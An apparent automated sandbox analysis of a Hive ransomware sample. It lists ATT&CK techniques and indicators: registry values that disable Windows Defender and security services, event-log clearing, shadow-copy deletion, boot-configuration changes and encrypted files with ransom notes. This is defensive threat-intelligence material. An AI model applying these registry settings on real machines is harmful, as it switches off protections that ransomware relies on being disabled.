hive | 773a84c3fcd0056ba603a8289affadb52b3ec1162fe161d4874aa9bc30b4e8d8

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

defense_evasion trojan

Modify Registry

Windows Service

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Modifies security service 2 TTPs 1 IoCs

defense_evasion

Modify Registry

Windows Service

defense_evasion ransomware

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

Clear Windows Event Logs

T1070.001

pid	Process
5860	wevtutil.exe
2024	wevtutil.exe
5140	wevtutil.exe

Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
2652	bcdedit.exe
5468	bcdedit.exe

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	firefox.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	tor-browser-windows-x86_64-portable-14.0.7.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	firefox.exe
Key value queried	\REGISTRY\USER\S-1-5-21-308834014-1004923324-1191300197-1000\Control Panel\International\Geo\Nation	firefox.exe

Executes dropped EXE 17 IoCs

pid	Process
4704	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
3956	tor-browser-windows-x86_64-portable-14.0.7.exe
5948	firefox.exe
1632	firefox.exe
6000	firefox.exe
4308	firefox.exe
5324	tor.exe
5216	firefox.exe
4424	firefox.exe
5504	firefox.exe
2072	firefox.exe
6512	firefox.exe
6544	firefox.exe
6576	firefox.exe
6264	firefox.exe
648	firefox.exe
6032	firefox.exe

Loads dropped DLL 64 IoCs

pid	Process
3956	tor-browser-windows-x86_64-portable-14.0.7.exe
3956	tor-browser-windows-x86_64-portable-14.0.7.exe
3956	tor-browser-windows-x86_64-portable-14.0.7.exe
5948	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
1632	firefox.exe
6000	firefox.exe
6000	firefox.exe
6000	firefox.exe
6000	firefox.exe
6000	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
4308	firefox.exe
5216	firefox.exe
5216	firefox.exe
5216	firefox.exe
5216	firefox.exe
5216	firefox.exe
4424	firefox.exe
4424	firefox.exe
4424	firefox.exe
4424	firefox.exe
4424	firefox.exe
5504	firefox.exe
5504	firefox.exe
5504	firefox.exe
5504	firefox.exe
5504	firefox.exe
5216	firefox.exe
5216	firefox.exe
5504	firefox.exe
5504	firefox.exe
2072	firefox.exe
2072	firefox.exe
2072	firefox.exe
2072	firefox.exe
2072	firefox.exe
4424	firefox.exe
4424	firefox.exe
2072	firefox.exe
2072	firefox.exe
6512	firefox.exe
6512	firefox.exe
6512	firefox.exe
6512	firefox.exe
6512	firefox.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe
6544	firefox.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Checks whether UAC is enabled 1 TTPs 1 IoCs

defense_evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	firefox.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1976	powershell.exe
3576	powershell.exe

Modifies Security services 2 TTPs 6 IoCs

Modifies the startup behavior of a security service.

defense_evasion

Modify Registry

Impair Defenses

T1562

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SecurityHealthService\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\MSIPC\da\msipc.dll.mui.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_t44blL2qg180.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WebMediaExtensions_1.0.20875.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\BadgeLogo.scale-125_contrast-white.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Collections\contrast-black\SmallTile.scale-200_contrast-black.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\flavormap.properties.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_rDwDJ70oW5A0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Java\jre-1.8\legal\jdk\relaxngom.md.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_-m2DhlvGQvA0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailSmallTile.scale-200.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\etrU_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\etrU_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\es-ES\mshwLatin.dll.mui	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\hijrah-config-umalqura.properties.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_BqWPB0skNsE0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Retail-ul-phn.xrm-ms.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_fPHsAW2h2EQ0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ul-oob.xrm-ms.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_hOS5K5XAaMc0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MSPaint_6.1907.29027.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Sticker_CatEye.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1902.633.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppList.targetsize-48_altform-lightunplated.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_x64__8wekyb3d8bbwe\Assets\AppTiles\contrast-white\MapsAppList.targetsize-72.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxSpeechToTextOverlay_1.17.29001.0_x64__8wekyb3d8bbwe\Assets\GamesXboxHubStoreLogo.scale-200.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Assets\Square44x44LogoExtensions.targetsize-256.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\ScreenSketchAppService\ReadMe.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.513.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ko-kr\ui-strings.js.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_JaZjCBGogQY0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\ui-strings.js.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_k8-w9utMXOo0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\ado\msado60.tlb	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\etrU_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ink\ipsdan.xml	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\en-us\TellMeOneNote.nrr	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\ScreenSketchSquare44x44Logo.targetsize-96_altform-lightunplated.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\RTL\contrast-white\WideTile.scale-100.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\download.svg.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_Iv_M5tfbLj00.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.BingWeather_4.25.20211.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\192.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.12026.20112.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNewNoteSmallTile.scale-125.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-30_altform-unplated_contrast-black.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\etrU_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\BLENDS.ELM.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_kjPQrJiSsGI0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ScreenSketch_10.1907.2471.0_x64__8wekyb3d8bbwe\Assets\Timer10Sec.targetsize-32.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\en-il\etrU_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Common Files\Microsoft Shared\ink\de-DE\TipRes.dll.mui	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\ro-ro\etrU_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019DemoR_BypassTrial180-ppd.xrm-ms.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_wWiNXqYD45w0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\StandardMSDNR_Retail-ul-oob.xrm-ms.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_hNmigVkC3A80.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\AppList.targetsize-96_altform-unplated_contrast-black.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\Doughboy.scale-200.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_6F36u2KdhGI0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\etrU_HOW_TO_DECRYPT.txt	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessR_Trial-ppd.xrm-ms.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_fMUAwggN-K80.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ul-oob.xrm-ms.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_XKc9KA7THEg0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_8.2.22942.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-24_altform-unplated.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.4.8204.0_x64__8wekyb3d8bbwe\Win10\Classic\Klondike.Large.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1906.2182.0_x64__8wekyb3d8bbwe\Assets\AlarmsSmallTile.contrast-white_scale-200.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\HxMailSmallTile.scale-150.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\CancelFluent.White@3x.png.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_oDZpOZj2Dwg0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Windows Photo Viewer\de-DE\PhotoViewer.dll.mui	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MixedReality.Portal_2000.19081.1301.0_x64__8wekyb3d8bbwe\Assets\Notification_AppLogo_PowerStatus.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\MakeAccessible.api.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_MXjrfV4s8Eo0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\en-US\wmpnssci.dll.mui	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\offsymsb.ttf.d4D2tF2OZm-3fum36tckV3UUU0LGli8qV7nPtizF4XP_xIBD_UxhfEw0.mhkwl	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.MixedReality.Portal_2000.19081.1301.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\contrast-white\MixedRealityPortalStoreLogo.scale-125_contrast-white.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1906.1972.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Work\RTL\contrast-white\MedTile.scale-125.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AlbumMediumTile.scale-100.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\images\contrast-white\HxCalendarLargeTile.scale-150.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ScreenSketch_10.1907.2471.0_neutral_split.scale-125_8wekyb3d8bbwe\resources.pri	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.HEIFImageExtension_1.0.22742.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-48.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.VP9VideoExtensions_1.0.22681.0_x64__8wekyb3d8bbwe\Assets\contrast-black\WideTile.scale-200_contrast-black.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.19071.19011.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\contrast-white\Movie-TVStoreLogo.scale-100_contrast-white.png	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_6.1908.2042.0_x64__8wekyb3d8bbwe\Common.View.UWP\Strings\ar-SA\View3d\3DViewerProductDescription-universal.xml	Trojan-Ransom.Win32.Hive.cw-de5867fbc85c4f2cd210f60d565c99ab039f0be41c0ec6c7729d795d0ff15ecf.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1252	sc.exe
4016	sc.exe
2984	sc.exe
2392	sc.exe
4128	sc.exe
1436	sc.exe
3512	sc.exe
1628	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
7108	cmd.exe
3628	PING.EXE

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 10 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
